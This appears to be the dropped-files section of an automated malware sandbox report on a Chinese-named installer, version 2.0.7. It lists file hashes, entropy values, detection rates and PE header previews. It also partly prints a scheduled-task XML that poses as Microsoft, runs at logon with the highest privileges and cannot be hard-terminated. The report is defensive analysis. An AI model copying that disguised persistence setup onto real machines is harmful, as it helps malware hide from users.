                                                                                                              Entropy (8bit):7.999274308700479
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                                                                                              MD5:EE4E379C02879163A818FB56A4AE3930
                                                                                                              SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                                                                                              SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                                                                                              SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5649408
                                                                                                              Entropy (8bit):6.392614480390128
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                                                                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                                                                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                                                                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                                                                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):249984
                                                                                                              Entropy (8bit):7.999274308700479
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                                                                                              MD5:EE4E379C02879163A818FB56A4AE3930
                                                                                                              SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                                                                                              SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                                                                                              SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996814134856588
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:5ltaPvHpC96l8yuZs7O5xYc4l0Vw6FjTHkk78:5vaP/pI7G7ubQAw6R/8
                                                                                                              MD5:731DCEB356DC74ECD9DE5DD2323E44FA
                                                                                                              SHA1:65E0622ADE1BD3945E3D7860AAE4B32F00B3C8F3
                                                                                                              SHA-256:8F9A5351DDDF49F841EC2FD4375288745E3336D0A7A32B7D73404547BEDB0EB1
                                                                                                              SHA-512:D0DA6349F2041FB62F758C1CD8ED03BAD40ECAAB71495423EBE920FE7470B0F80B4DA5FAEFB0DE5E0C2F64200009B73671B254F7AA4D97E18071415C8E587D40
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996814134856595
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:IDxPHdRX/rHrANzavMASxNWt6F2SAXu6F:yXQzavM3WO2Lu6F
                                                                                                              MD5:EFA5A00025A30EB18D9C91B732AA1D0C
                                                                                                              SHA1:57F20B3F1A945CA875D746D678481867E14B277B
                                                                                                              SHA-256:55F744D7966908EB2BA0A81651E2D9CB5266F169639B47C5BF53E028CA4C1117
                                                                                                              SHA-512:B09460ED5607BACF05FCC9C5E01357DCF0E2532AB11E23A77210AFA4503D4F4E35B8A43B3C6B5EBE27EB748F530C778BCEAA0323BE220D06395E660CDB7792F6
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996966859255975
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                                                                              MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                                                                              SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                                                                              SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                                                                              SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996966859255979
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                                                                              MD5:4CB8B7E557C80FC7B014133AB834A042
                                                                                                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                                                                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                                                                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):31890
                                                                                                              Entropy (8bit):7.99402458740637
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                                                                              MD5:8622FC7228777F64A47BD6C61478ADD9
                                                                                                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                                                                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                                                                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):31890
                                                                                                              Entropy (8bit):7.99402458740637
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                                                                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                                                                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                                                                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                                                                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):74960
                                                                                                              Entropy (8bit):7.99759370165655
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                                                                              MD5:950338D50B95A25F494EE74E97B7B7A9
                                                                                                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                                                                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                                                                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):74960
                                                                                                              Entropy (8bit):7.997593701656546
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                                                                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                                                                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                                                                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                                                                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29730
                                                                                                              Entropy (8bit):7.994290657653607
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                                                                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                                                                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                                                                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                                                                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:modified
                                                                                                              Size (bytes):29730
                                                                                                              Entropy (8bit):7.994290657653608
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                                                                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                                                                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                                                                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                                                                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                                                                              Malicious:false
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):249984
                                                                                                              Entropy (8bit):7.99927430870047
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:5ca7IDBMN0AXMgKXYYoAGThkbN0lJyx7cLoHAd0cWkkoUEXU2bO:Z7IDC9mb1+WN0Dyhwh0cWloUP2bO
                                                                                                              MD5:D129E17A30F3E99E49E639655EB5DEB2
                                                                                                              SHA1:302C332A978CB967E95F2B54A713BD1D2F72A131
                                                                                                              SHA-256:BE38AB40C78A620589239D5111CD51FFF82D4930C7CB296F579936ADFD2AB05A
                                                                                                              SHA-512:39A5F12F479357D0FC8EE5CC23EB1030C152C2FCB673B2FA7675D6C2BE9B5F3C0B2221825CF7BBF551E48D9957ECA21B43394B24812EEEDD8DAB3204DCE79341
                                                                                                              Malicious:false
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):63640
                                                                                                              Entropy (8bit):6.482810107683822
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                                                                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                                                                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                                                                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                                                                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):3.3559826956858623
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:dXKLzDlnnL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnWwhldOVQOj6dKbKsz7
                                                                                                              MD5:A94F9E54EA11556400441692EB6F0CA5
                                                                                                              SHA1:A73C35EA81ADA95CB0710741B4895EF701F164DD
                                                                                                              SHA-256:7550ACACE86423FBE52531E41556ED2D487FA2E6A97E05A0AA36F65A01559123
                                                                                                              SHA-512:63FA0A6DC34650E7B52EC9C664B665D499803485C12C8C9BF33C2DC909B2C1C4D933D32068EC00881E34A83C8E3BFE598217694728914DB814957C7A603565F5
                                                                                                              Malicious:false
                                                                                                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNet
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5649408
                                                                                                              Entropy (8bit):6.392614480390128
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                                                                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                                                                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                                                                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                                                                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3584000
                                                                                                              Entropy (8bit):7.00283805408099
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                                                                                              MD5:4DB75814BF4A212D3AEBA5831C059402
                                                                                                              SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                                                                                              SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                                                                                              SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                              Malicious:false
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.720366600008286
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:modified
Size (bytes):3584000
Entropy (8bit):7.00283805408099
Encrypted:false
SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
MD5:4DB75814BF4A212D3AEBA5831C059402
SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):3366912
Entropy (8bit):6.530549308235048
Encrypted:false
SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.720366600008286
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3584000
Entropy (8bit):7.00283805408099
Encrypted:false
SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
MD5:4DB75814BF4A212D3AEBA5831C059402
SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 13%
Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):3366912
Entropy (8bit):6.530549308235048
Encrypted:false
SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files (x86)\Windows NT\7zr.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):406
Entropy (8bit):5.117520345541057
Encrypted:false
SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
MD5:9200058492BCA8F9D88B4877F842C148
SHA1:EED69748A26CFAF769EF589F395A162E87005B36
SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
